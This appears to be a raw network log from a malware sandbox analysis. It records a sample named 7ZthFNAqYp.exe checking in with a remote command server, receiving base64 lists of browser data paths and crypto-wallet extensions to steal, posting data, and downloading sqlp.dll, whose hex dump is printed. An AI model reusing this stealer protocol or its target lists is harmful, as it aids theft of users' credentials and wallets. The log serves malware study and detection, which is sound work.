                                                                                                                                                                                                            2024-10-23 05:03:14 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                            Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.64999295.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:15 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------DGDAEHCBGIIJJJJKKKEHCont
                                                                                                                                                                                                            2024-10-23 05:03:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:15 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:03:15 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                            Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.64999395.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:16 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 332
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:16 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------CFCBFBGDBKJKECAAKKFHCont
                                                                                                                                                                                                            2024-10-23 05:03:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:17 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:03:17 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.64999495.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:18 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 5461
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:18 UTC5461OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------CFIEHCFIECBGCBFHIJJKCont
                                                                                                                                                                                                            2024-10-23 05:03:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:39 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:03:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.64999595.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:19 UTC195OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:20 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:19 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 2459136
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:19 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-10-23 05:03:20 UTC16120INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                            2024-10-23 05:03:20 UTC16384INData Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                            Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                            2024-10-23 05:03:20 UTC16384INData Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53
                                                                                                                                                                                                            Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
                                                                                                                                                                                                            2024-10-23 05:03:20 UTC16384INData Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35
                                                                                                                                                                                                            Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                            2024-10-23 05:03:20 UTC16384INData Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e
                                                                                                                                                                                                            Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                            2024-10-23 05:03:20 UTC16384INData Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                            Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                            2024-10-23 05:03:20 UTC16384INData Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                            Data Ascii: $td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                            2024-10-23 05:03:20 UTC16384INData Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14
                                                                                                                                                                                                            Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                            2024-10-23 05:03:21 UTC16384INData Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00
                                                                                                                                                                                                            Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                            2024-10-23 05:03:21 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4
                                                                                                                                                                                                            Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$
                                                                                                                                                                                                            2024-10-23 05:03:25 UTC16384INDELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count(*) FROM %Q.'%q_%s'tokencharsseparatorsL* N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED]
                                                                                                                                                                                                            r:Y<|=>MbP?|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED]
                                                                                                                                                                                                            i"
                                                                                                                                                                                                            i"$i"0i"8i"Di"Pi"\i"hi"
